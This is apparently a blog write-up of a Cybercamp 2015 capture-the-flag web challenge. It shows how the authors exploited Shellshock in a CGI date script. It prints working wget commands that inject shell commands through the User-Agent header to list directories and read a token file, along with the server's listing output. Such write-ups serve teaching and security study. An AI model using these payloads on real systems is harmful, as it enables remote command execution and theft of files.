English [Cybercamp 2015] [Web 13] Write Up

On the index page, we got a form asking us the hour in seconds, and an html frame pointing to a cgi script, which shows us the hour in letters.
Our first idea was to make a script which will synchronize with the hour printed by the CGI, in order to have the exact hour at the good time, but this leads to just nothing.
Our second idea were really better. We looked for a vulnerability, isn’t it? And we have a CGI script, isn’t it? What if this challenge was an exploitation of our pretty shellshock?

A little test with wget gave our smile back! The subtlety here was to not forget to put the WHOLE path to the ls binary, otherwise, the flaw did not work đŸ˜‰

wget -U '() { :; }; echo; /bin/ls' -qO- http://challenge.cybercamp.es:8093/cgi-bin/date.cgi

This command returned us the whole listing of the current folder, the one who was containing the date.cgi script. Nothing interesting here.
So the next part was to find the good folder, the one with the flag file :).
As we saw earlier, thanks to HTTP headers, that the server was running apche, we tried to list the default directory for web files: /var/www/html.

$ wget -U '() { :; }; echo; /bin/ls -la /var/www/html' -qO- http://challenge.cybercamp.es:8093/cgi-bin/date.cgi
total 28
drwxr-xr-x 5 root root 4096 Jun 17 00:35 .
drwxr-xr-x 3 root root 4096 Jun 9 19:22 ..
drwxr-xr-x 2 root root 4096 Jul 22 11:51 css
-rw-r--r-- 1 root root 34   Jun 9 23:04 datet0ken
drwxr-xr-x 2 root root 4096 Jul 22 11:51 fonts
-rw-r--r-- 1 root root 1779 Jun 17 00:35 index.html
drwxr-xr-x 2 root root 4096 Jul 22 11:51 js

Great!! We now just need to get the token.

$ wget -U '() { :; }; echo; /bin/cat /var/www/html/datet0ken' -qO- http://challenge.cybercamp.es:8093/cgi-bin/date.cgi

Leave a Reply

Your email address will not be published. Required fields are marked *